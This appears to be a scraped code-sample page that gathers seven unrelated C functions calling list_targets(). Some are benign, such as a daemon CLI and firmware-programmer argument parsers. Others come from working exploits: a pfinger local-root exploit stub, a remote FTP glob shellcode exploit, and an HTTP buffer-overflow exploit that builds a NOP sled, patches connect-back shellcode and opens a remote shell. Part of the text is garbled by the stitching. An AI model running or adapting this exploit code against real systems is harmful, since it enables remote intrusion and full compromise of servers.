Пример #1
0
/*ARGSUSED*/
void
list_func(xml_node_t *p, target_queue_t *reply, target_queue_t *mgmt)
{
	xml_node_t	*x;
	char		msgbuf[80],
			*reply_msg	= NULL;

	if (p->x_child == NULL) {
		xml_rtn_msg(&reply_msg, ERR_SYNTAX_MISSING_OBJECT);
	} else {
		x = p->x_child;

		if (x->x_name == NULL) {
			xml_rtn_msg(&reply_msg, ERR_SYNTAX_MISSING_OBJECT);
		} else if (strcmp(x->x_name, XML_ELEMENT_TARG) == 0) {
			reply_msg = list_targets(x);
		} else if (strcmp(x->x_name, XML_ELEMENT_INIT) == 0) {
			reply_msg = list_initiator(x);
		} else if (strcmp(x->x_name, XML_ELEMENT_TPGT) == 0) {
			reply_msg = list_tpgt(x);
		} else if (strcmp(x->x_name, XML_ELEMENT_ADMIN) == 0) {
			reply_msg = list_admin(x);
		} else {
			(void) snprintf(msgbuf, sizeof (msgbuf),
			    "Unknown object '%s' for list element",
			    x->x_name);
			xml_rtn_msg(&reply_msg, ERR_INVALID_OBJECT);
		}
	}
	queue_message_set(reply, 0, msg_mgmt_rply, reply_msg);
}
Пример #2
0
int
main(int argc, char** argv)
{
	const char* command = "list";
	bool verbose = false;

	int c;
	while ((c = getopt_long(argc, argv, "+hv", kLongOptions, NULL)) != -1) {
		switch (c) {
			case 0:
				break;
			case 'h':
				usage(0);
				break;
			case 'v':
				verbose = true;
				break;
			default:
				usage(1);
				break;
		}
	}

	if (argc - optind >= 1)
		command = argv[optind];

	if (strcmp(command, "list") == 0) {
		list_jobs(verbose);
	} else if (strcmp(command, "list-targets") == 0) {
		list_targets(verbose);
	} else if (strcmp(command, "log") == 0) {
		get_log(argc - optind, &argv[optind]);
	} else if (argc == optind + 1) {
		// For convenience (the "info" command can be omitted)
		get_info(command);
	} else {
		// All commands that need a name following

		const char* name = argv[argc - 1];

		if (strcmp(command, "info") == 0) {
			get_info(name);
		} else if (strcmp(command, "start") == 0) {
			start_job(name);
		} else if (strcmp(command, "stop") == 0) {
			stop_job(name);
		} else if (strcmp(command, "restart") == 0) {
			restart_job(name);
		} else if (strcmp(command, "enable") == 0) {
			enable_job(name, true);
		} else if (strcmp(command, "disable") == 0) {
			enable_job(name, false);
		} else {
			fprintf(stderr, "%s: Unknown command \"%s\".\n", kProgramName,
				command);
		}
	}
	return 0;
}
Пример #3
0
void ussage (char *argv) {
        printf ("%s - pfinger local root, user, whatever exploit\n", argv);
        printf ("written by dvdman\n\n");

        printf ("Ussage %s <target type> \ntargets avalible:\n\n");
        list_targets ();
        exit(0);
}
Пример #4
0
int32_t parse_arguments( struct programmer_arguments *args,
                         const size_t argc,
                         char **argv )
{
    int32_t i;
    int32_t status = 0;

    if( NULL == args )
        return -1;

    /* initialize the argument block to empty, known values */
    args->target  = tar_none;
    args->command = com_none;
    args->quiet   = 0;
    args->suppressbootloader = 0;

    /* Special case - check for the help commands which do not require a device type */
    if( argc == 2 ) {
        if( 0 == strcasecmp(argv[1], "--version") ) {
            fprintf( stderr, PACKAGE_STRING "\n");
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--targets") ) {
            list_targets( LIST_STD );
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--targets-tex") ) {
            list_targets( LIST_TEX );
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--targets-html") ) {
            list_targets( LIST_HTML );
            return 1;
        }
        if( 0 == strcasecmp(argv[1], "--help") ||
                0 == strcasecmp(argv[1], "-h") ||
                0 == strcasecmp(argv[1], "--h") ) {
            usage();
            return 1;
        }
    }

    /* Make sure there are the minimum arguments */
    if( argc < 3 ) {
        basic_help();
        return -1;
    }

    if( 0 != assign_target(args, argv[1], target_map) ) {
        fprintf( stderr, "Unsupported target '%s'.\n", argv[1]);
        status = -3;
        goto done;
    }

    if( 0 != assign_option((int32_t *) &(args->command), argv[2], command_map) ) {
        status = -4;
        goto done;
    }

    /* These were taken care of above. */
    *argv[0] = '\0';
    *argv[1] = '\0';
    *argv[2] = '\0';

    /* assign command specific default values */
    switch( args->command ) {
    case com_flash :
        args->com_flash_data.force = 0;
        args->com_flash_data.segment = mem_flash;
        break;
    case com_launch :
        args->com_launch_config.noreset = 0;
        break;
    case com_dump :
        args->com_read_data.segment = mem_flash;
        args->com_flash_data.force = 0;
        break;
    case com_bin2hex :
        args->com_convert_data.segment = mem_flash;
        break;
    default :
        break;
    }

    if( 0 != assign_global_options(args, argc, argv) ) {
        status = -5;
        goto done;
    }

    if( 0 != assign_command_options(args, argc, argv) ) {
        status = -6;
        goto done;
    }

    /* Make sure there weren't any *extra* options. */
    for( i = 0; i < argc; i++ ) {
        if( '\0' != *argv[i] ) {
            fprintf( stderr, "unrecognized parameter\n" );
            status = -7;
            goto done;
        }
    }

    /* if this is a flash command, restore the filename */
    if( (com_flash == args->command) || (com_eflash == args->command)
            || (com_user == args->command) ) {
        if( 0 == args->com_flash_data.file ) {
// TODO : it should be ok to not have a filename if --serial=hexdigits:offset is
// provided, this should be implemented.. in fact, given that most of this
// program is written to use a single command by it self, this probably should
// be separated out as a new command.  The caveat is if data is written to '\0'
// in the hex file, serialize will do nothing bc can't unwrite w/o erase
            fprintf( stderr, "flash filename is missing\n" );
            status = -8;
            goto done;
        }
        args->com_flash_data.file[0] = args->com_flash_data.original_first_char;
    }

    if( (com_bin2hex == args->command) || (com_hex2bin == args->command) ) {
        if( 0 == args->com_convert_data.file ) {
            fprintf( stderr, "conversion filename is missing\n" );
            status = -8;
            goto done;
        }
        args->com_convert_data.file[0] = args->com_convert_data.original_first_char;
    }

done:
    if( 1 < debug ) {
        print_args( args );
    }

    if(-3 == status ) {
        list_targets( LIST_STD );
    } else if( 0 != status ) {
        usage();
    }

    return status;
}
Пример #5
0
int main(int argc, char **argv)
{
    int sock, c; 
    int port       = FTP_PORT;
    int debuglevel = 0;
    char *host     = NULL;
    char *username = NULL;
    char *password = NULL;
    
    struct arch *arch       = NULL;
    char *shellcode         = bsdcode;
    int target              = 0;
    int sleep_time          = 0;
    unsigned long code_addr = 0;
    char *homedir           = NULL;;
    
    /* grab command line parameters */
    while((c = getopt(argc, argv, "c:o:u:p:it:d:l:v:s:h")) != EOF)
    {
	switch(c)
	{
	case 'c':
	    host = Strdup(optarg);
	    break;

	case 'o':
	    port = atoi(optarg);
	    break;
	    
	case 'u':
	    username = Strdup(optarg);
	    break;
	    
	case 'p':
	    password = Strdup(optarg);
	    /* hide the password from ps */
	    memset(optarg, 'X', strlen(optarg));
	    break;

	case 'i':
	    password = getpass("Enter remote password: "******"list") == 0)
	    {
		list_targets();
		return EXIT_FAILURE;
	    }
	    
	    target = atoi(optarg);
	    arch = &(archlist[target]);
	    code_addr = ntohl(arch->code_addr);
	    shellcode = arch->shellcode;
	    break;

	case 'd':
	    homedir = Strdup(optarg);
	    break;

	case 'l':
	    code_addr = ntohl(strtoul(optarg, NULL, 0));
	    break;

	case 'v':
	    debuglevel = atoi(optarg);
	    break;

	case 's':
	    sleep_time = atoi(optarg);
	    break;

	default:
	    usage(argv[0]);
	    break;
	}
    }


    /* check for required options */
    if(host == NULL || username == NULL || password == NULL || code_addr == 0)
	usage(argv[0]);

    /* setup the debug level */
    switch(debuglevel)
    {
    case 1:
	debug_read = 1;
	debug_write = 0;
	break;

    case 2:
	debug_read = 1;
	debug_write = 1;
	break;
	
    default:
	debug_read = 0;
	debug_write = 0;
	break;
    }

    /* make sure the shellcode is good */
    if(!verify_shellcode(shellcode))
	return EXIT_FAILURE;
	
    /* initiate the tcp connection to the ftp server */
    if((sock = tcp_connect(host, port)) == -1)
    {
	fprintf(stderr, "[-] Connection to %s failed!\n", host);
	ftp_quit(sock);
	return EXIT_FAILURE;
    }

    if(arch == NULL)
	printf("[0] Connected to host %s.\n", host);
    else
	printf("[0] Connected to host %s\n\tusing type:\t%s.\n", 
	       host, arch->description);


    /* login */
    if(!ftp_login(sock, username, password))
    {
	fprintf(stderr, "[-] Login failed, aborting!\n");
	ftp_quit(sock);
	return EXIT_FAILURE;
    }

    /* hey, so im anal! */
    memset(password, 'X', strlen(password));
    memset(username, 'X', strlen(username));    

    printf("[1] Login succeeded.\n");

    if(sleep != 0)
	sleep(sleep_time);

    if(homedir == NULL)
    {
	/* get home directory */
	if((homedir = ftp_gethomedir(sock)) == NULL)
	{
	    fprintf(stderr, "[-] Couldn't retrieve home directory, aborting!\n");
	    ftp_quit(sock);
	    return EXIT_FAILURE;
	}
    }
	
    printf("[2] Home directory retrieved as \"%s\", %u bytes.\n", 
	   homedir, strlen(homedir));

    /* do the exploitation */
    if(!ftp_glob_exploit(sock, homedir, code_addr, shellcode))
    {
	fprintf(stderr, "[-] exploit failed, aborting!\n");
	ftp_quit(sock);
	return EXIT_FAILURE;
    }
    
      
    free(host);
    return EXIT_SUCCESS;
}
Пример #6
0
int main(int argc, char **argv, char **env) {
  if(argc<=1) usage(argv[0]); fputc('\n', stderr);
  while((ch=getopt(argc,argv,"t:s:p:a:l:i:r:xeb:vh"))!=EOF)
    switch (ch) {
    case 't': {
      i = atoi(optarg);
      if(!i)
	list_targets(),
          exit(0);
        else
          i--;
      target = tlist[i].type;
      addr = tlist[i].ret_addr;
      bsize = tlist[i].bsize;
      retfill = tlist[i].retfill;
      if(strstr(tlist[i].type, "1.3")) ver=3;
      if(strstr(tlist[i].type, "1.4")) ver=4;
    } break;
    case 's': {
      i = atoi(optarg);
      shelltype = slist[i].shelltype;
      shellcode = slist[i].shellcode;
      shellport = slist[i].shellport;
      backport = slist[i].backport;
    } break;
    case 'p': strncpy(path, optarg, sizeof(path)); break;
    case 'a': addr = strtoul(optarg, NULL, 0); break;
    case 'l': rlen = atoi(optarg); break;
    case 'i': bsize = atoi(optarg); break;
    case 'r': retfill = atoi(optarg); break;
    case 'v': verbose++; break;
    case 'x': test_shellcode(); break;
    case 'e': exploit++; break;
    case 'b': {
      strncpy(cmd, optarg, sizeof(cmd));
      for(i = 0; i < strlen(cmd); i++)
	if(cmd[i] == '.') cmd[i] = ' ';
      sscanf(cmd, "%d %d %d %d", &a, &b, &c, &d);
      if(!a||!b||!c||!d)
	log("0 in the ip. pls use another\n"),
          exit(0);
      if(!shellcode)
	log("use -s option before -b\n"),
          exit(0);
      if(shellcode==x86_bsd_connback)
	shellcode[24] = (char ) a,
	  shellcode[25] = (char ) b,
	  shellcode[26] = (char ) c,
	  shellcode[27] = (char ) d,
	  memcpy(&back, shellcode+24, 4);
      if(shellcode==x86_linux_connback)
	shellcode[12+33] = (char ) a,
	  shellcode[12+34] = (char ) b,
	  shellcode[12+35] = (char ) c,
	  shellcode[12+36] = (char ) d,
	  memcpy(&back, shellcode+12+33, 4);
    } break;
    case 'h': default: usage(argv[0]); break;
    }
  dest=argv[argc - 1];
  ptr=strchr(dest,':'); if(ptr!=NULL) { ptr[0]='\0'; ptr++; port=atoi(ptr);}

  log("start attack: (1.%d) %s\n\n", ver, target);
  log("connecting to %s %d ... ", dest, port);
  if(connectm(dest, port, &t)) exit(0);
  log("building query ...\n");
  if(ver>3) {
    sprintf(cmd, "Host: %s\n", dest);
    target=strdup(cmd);
  } else
    target=strdup("");
  sprintf(cmd,
    "GET %s HTTP/1.0\n"
    "%s"
    "Accept: text/html, text/plain\n"
	  "Accept: application/postscript, text/sgml, */*;q=0.01\n"
    "Accept-Encoding: gzip, compress\n"
    "Accept-Language: en\n"
    "Negotiate: trans\n"
    "User-Agent: Lynx/6.6.6\n"
	  "\n", path, target);
  log("sending query (%d) ... ", strlen(cmd));
  if(verbose) log("send>\n%s\n<send\n", cmd);
  writem(); perror(NULL);
  log("receiving data ...\n");
  recvall(rlen);
  close(t);
  if(srvok)
    exit(0);
  if(!m302ok)
    log("url path not redirected. use -p to override\n"),
      exit(0);
  if(!rlen)
    log("rlen auto detection fail. use -l to override\n"),
      exit(0);
  if(rlen % 2)
    log("alignment error (rlen: %d). not exploitable.\n", rlen),
      exit(0);

  log("addr: 0x%x\n", (unsigned int) addr);
  log("rlen: %d\n", rlen);
  log("offset: %d\n", offset);
  addr += rlen + offset;
  log("use addr: 0x%x (addr + rlen + offset)\n", (unsigned int) addr);

  bsize-=rlen;
  bsize-=retfill;
  bsize/=2;
  log("buffer size: %d ((bsize-rlen-retfill)/2)\n", bsize);
  log("retfill: %d\n", retfill);
  log("shellcode len: %d\n\n", strlen(shellcode));

  if(!exploit)
    log("all seems ok. run again with -e option\n"),
      exit(0);
  if(backport) {
    if(!back)
      log("no connect back ip. use -b option\n"),
	exit(0);
    log("connect back to: 0x%08x %d\n", (unsigned long) back, backport);
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    s.sin_family = AF_INET;
    s.sin_port = htons(backport);
    s.sin_addr.s_addr = htonl(INADDR_ANY);
    debug("... bind", bind(sock, (struct sockaddr *)&s, sizeof(s)));
    debug("... listen", listen(sock, 5));
  }
  starttime = time(NULL); setjmp(w);
  log("ready in %d sec...\r", starttime + TIMEOUT - time(NULL));
  if(starttime + TIMEOUT >= time(NULL)) longjmp(w, 1);

  log("connecting to %s %d ... ", dest, port);
  if(connectm(dest, port, &t)) exit(0);
  log("building data ...\n");
  buff = (char *)malloc(bsize+retfill*4+100);
  memset(buff, 0x00, bsize+retfill*4+100);
  for(i=0; i<bsize; i++) buff[i] = 0x90;
  ptr=buff+((bsize)-(strlen(shellcode)));
  for(i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i];
  addr_ptr = (long *)ptr;
  for(i=0; i<retfill; i+=4) *(addr_ptr++)=addr;

  log("building query + data ...\n");
  sprintf(cmd,
    "GET %s%s HTTP/1.0\n"
    "%s"
    "Accept: text/html, text/plain\n"
	  "Accept: application/postscript, text/sgml, */*;q=0.01\n"
    "Accept-Encoding: gzip, compress\n"
    "Accept-Language: en\n"
    "Negotiate: trans\n"
    "User-Agent: Lynx/6.6.6\n"
	  "\n", path, buff, target);
  log("sending query + data (all: %d) (buff: %d) ... ",
      strlen(cmd), strlen(buff));
  if(verbose) log("send>\n%s\n<send\n", cmd);
  writem(); perror(NULL);

  log("shell ...\n");
  if(shellport) {
    log("connecting to %s %d ... ", dest, shellport);
    sleep(1); if(connectm(dest, shellport, &sock)) exit(0);
  }
  if(backport) {
    debug("... accept", sock = accept(sock, (struct sockaddr *)&s, &l));
  }
  signal(2, sigh);
  shell();
  CLOSE(t);
  CLOSE(sock);
  FREE(target);
  log("done.\n");
  return 0;
}
Пример #7
0
int32_t parse_arguments( struct programmer_arguments *args,
                         const size_t argc,
                         char **argv )
{
    int32_t i;
    int32_t status = 0;

    if( NULL == args )
        return -1;

    /* initialize the argument block to empty, known values */
    args->target  = tar_none;
    args->command = com_none;
    args->quiet   = 0;
    args->suppressbootloader = 0;

    /* Special case - check for the help commands which do not require a device type */
    if( argc == 2 ) {
        if( 0 == strcasecmp(argv[1], "--version") ) {
            fprintf( stderr, PACKAGE_STRING "\n");
            return -1;
        }
        if( 0 == strcasecmp(argv[1], "--targets") ) {
            list_targets();
            return -1;
        }
        if( 0 == strcasecmp(argv[1], "--help") ) {
            usage();
            return -1;
        }
    }

    /* Make sure there are the minimum arguments */
    if( argc < 3 ) {
        basic_help();
        return -1;
    }

    if( 0 != assign_target(args, argv[1], target_map) ) {
        fprintf( stderr, "Unsupported target '%s'.\n", argv[1]);
        status = -3;
        goto done;
    }

    if( 0 != assign_option((int32_t *) &(args->command), argv[2], command_map) ) {
        status = -4;
        goto done;
    }

    /* These were taken care of above. */
    *argv[0] = '\0';
    *argv[1] = '\0';
    *argv[2] = '\0';

    if( 0 != assign_global_options(args, argc, argv) ) {
        status = -5;
        goto done;
    }

    if( 0 != assign_command_options(args, argc, argv) ) {
        status = -6;
        goto done;
    }

    /* Make sure there weren't any *extra* options. */
    for( i = 0; i < argc; i++ ) {
        if( '\0' != *argv[i] ) {
            fprintf( stderr, "unrecognized parameter\n" );
            status = -7;
            goto done;
        }
    }

    /* if this is a flash command, restore the filename */
    if( (com_flash == args->command) || (com_eflash == args->command) || (com_user == args->command) ) {
        if( 0 == args->com_flash_data.file ) {
            fprintf( stderr, "flash filename is missing\n" );
            status = -8;
            goto done;
        }
        args->com_flash_data.file[0] = args->com_flash_data.original_first_char;
    }

done:
    if( 1 < debug ) {
        print_args( args );
    }

    if(-3 == status ) {
        list_targets();
    } else if( 0 != status ) {
        usage();
    }

    return status;
}